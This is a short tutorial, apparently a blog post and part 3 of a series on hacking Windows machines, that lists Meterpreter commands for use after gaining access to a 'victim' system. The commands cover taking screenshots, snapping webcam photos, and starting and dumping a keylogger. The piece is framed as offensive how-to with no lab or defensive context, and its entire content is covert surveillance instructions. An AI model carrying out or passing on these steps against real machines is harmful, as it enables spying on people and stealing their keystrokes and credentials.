How to Hack windows machine; Part 3

In the previous tutorials we have learnt how to gain access to a windows system. In this tutorial we can see what we can do with meterpreter session

Type help to see all command

We can use the screenshot command to take screenshot of the victim current screen

Type screenshot

To take take webcam photo

Type webcam_snap

To take extract keystrokes of the victims

To start keylogger

Type keyscan_start

To see all keystrokes

Type keyscan_dump

Leave a Comment